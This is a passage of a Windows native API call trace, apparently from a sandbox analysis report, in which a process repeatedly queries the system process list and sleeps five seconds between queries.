RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.501] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.513] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.514] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.514] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.514] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.516] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.517] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.529] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.529] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.529] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.530] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.530] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.532] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.532] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.545] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.545] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.545] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.547] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.548] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.560] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.561] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.561] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.561] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.563] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.564] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.579] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.580] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.580] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.581] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.581] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.584] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.585] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.591] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.592] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.592] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.592] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.594] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.595] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.607] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.608] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.608] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.608] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.609] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.612] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.613] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.623] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.623] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.624] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.624] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.624] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.626] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.627] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.638] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.639] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.639] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.639] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.642] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.642] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.654] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.654] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.655] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.655] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.655] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.658] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.658] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.669] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.670] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.670] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.670] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.672] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.673] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.686] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.686] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.687] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.687] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.687] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.690] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.690] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.701] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.701] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.702] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.702] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.702] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.704] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.705] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.716] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.717] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.717] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.717] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.718] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.720] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.720] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.732] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.732] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.733] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.733] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.733] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.735] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.736] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.748] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.748] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.748] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.749] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.749] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.751] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.751] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.763] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.763] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.764] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.764] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.764] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.766] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.767] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.779] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.779] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.779] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.780] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.780] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.782] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.782] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.795] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.795] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.796] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.796] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.796] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.799] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.799] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.810] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.810] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.811] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.811] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.811] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.813] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.814] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.825] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0157.826] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0157.826] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0157.826] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0157.827] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0157.828] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0157.829] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0157.841] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: 